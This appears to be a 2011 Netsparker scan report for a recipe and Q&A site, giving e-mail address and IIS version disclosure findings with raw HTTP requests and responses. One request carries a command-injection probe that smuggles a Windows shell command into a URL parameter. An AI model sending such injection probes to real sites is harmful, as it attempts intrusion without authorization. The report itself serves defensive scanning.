P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:45:36 GMT
Content-Length: 713
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


document.write("\n");document.write("\n");document.write("<div style=\"height:40px;font-size:14px;line-height:18px;color:#668C1F;padding:0 0 10px 50px;background:url(http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/qmark.png) no-repeat;\">\n");document.write(" Good snacks for get togethers?\n");document.write("</div>\n");document.write("<div style=\"height:100px;overflow:hidden;padding:0 0 15px;\">\n");document.write(" I'm hosting a party and need some suggestions for salty snacks. I've got the sweet stuff down.<br /><br />\n");document.write("- Asked By angzt\n");document.write("</div>\n");document.write("<div style=\"text-align:right;padding:0 10px 6px 0;overflow:hidden;zoom:1;\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=2646&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni\" style=\"float:right;height:26px;overflow:hidden;\"><img src=\"http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/btn-answer.png\" alt=\"Answer\" style=\"border:0\" onmouseover=\"this.style.margin='-26px 0 0'\" onmouseout=\"this.style.margin='0'\" /></a>\n");document.write("</div>\n");document.write("<div style=\"border-top:1px dashed #e4e4e4;text-align:right;padding:6px 10px 0 0\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx/best_of/2646_Good-snacks-for-get-togethers.html?query=recent_questions&kr=true\" style=\"color:#668C1F;text-decoration:none;font-size:13px;\" onmouseover=\"this.style.color='#253E0B'\" onmouseout=\"this.style.color='#668C1F'\">See how other people responded</a> <span style=\"color:#F1003E\">»</span>\n");document.write("</div>\n");document.write("\n");
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=page_not_found.ascx&error=

Parameters

Parameter Type Value
template GET page_not_found.ascx
error GET

Found E-mails

  • customerservice@Answerology.com
  • Info@Answerology.com

Request

GET /index.aspx?template=page_not_found.ascx&error= HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 72549
Date: Sat, 17 Sep 2011 13:34:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>FAQs: About Answerology.com</title><meta name="title" content="FAQs: About Answerology.com" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.105 9/17/2011 9:34:29 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=1384574749"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=1384574749"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=1384574749"></script> <script type="text/javascript" src="/cssjs/headers.js?v=1384574749"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'page_not_found.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=1384574749"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id="msn_header_ad"> <div id="ad_container"> <span id="ams_delish_top"><div id="divID_DLSRD1" name="div_DLSRD1" align="..
IIS Version Disclosure

IIS Version Disclosure
1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- //index.aspx

//index.aspx

http://answerology.delish.com//index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetNam..

Extracted Version

Microsoft-IIS/6.0

Request

GET //index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Location: /index.aspx?template=page_not_found.ascx&error=
Content-Type: text/html; charset=utf-8
Content-Length: 174
Date: Sat, 17 Sep 2011 13:34:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.aspx%3ftemplate%3dpage_not_found.ascx%26error%3d">here</a>.</h2>
</body></html>